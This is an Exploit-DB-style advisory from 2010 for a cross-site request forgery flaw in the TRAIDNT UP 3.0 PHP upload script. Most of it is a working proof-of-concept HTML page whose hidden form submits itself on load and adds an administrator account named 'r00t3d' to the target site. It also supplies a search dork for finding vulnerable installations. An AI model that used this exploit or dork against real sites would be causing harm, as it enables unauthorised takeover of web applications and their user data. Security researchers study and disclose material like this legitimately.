Traidnt Up 3.0 - Cross-Site Request Forgery

EDB-ID:

15826

CVE:

N/A


Author:

P0C T34M

Type:

webapps


Platform:

PHP

Date:

2010-12-25


#Title    :  TRAIDNT UP Version 3.0  - CSRF Add Admin
#Script   :  TRAIDNT UP Version 3.0 
#Language : Php
#Download : http://www.traidnt.net
#                  http://www.traidnt.net/vb/attachment.php?attachmentid=519880&d=1285278011
#Date     : 2010/12/25
#Version  : 3.0
#Dork     : "Powered by TRAIDNT UP Version 3.0 "
#Found    : by P0C T34M >> tnt-r00t 
#Homepage : www.p0c.cc



<html>
    <form name="p0c" action="http://127.0.0.1/up/admin/users.php?do=addnew" method="post">
    <input type="hidden" name="name" value="r00t3d"/>
    <input type="hidden" name="password" value="Password"/>
    <input type="hidden" name="email" value="myemail@hotmail.com"/>
    <input type="hidden" name="birthdate" value="1987"/>
    <input type="hidden" name="country" value="SA"/>
    <input type="hidden" name="group" value="1"/>
</form>
<script>document.p0c.submit();</script>
</html>
TRAIDNT UP Version 3.0  - CSRF Add Admin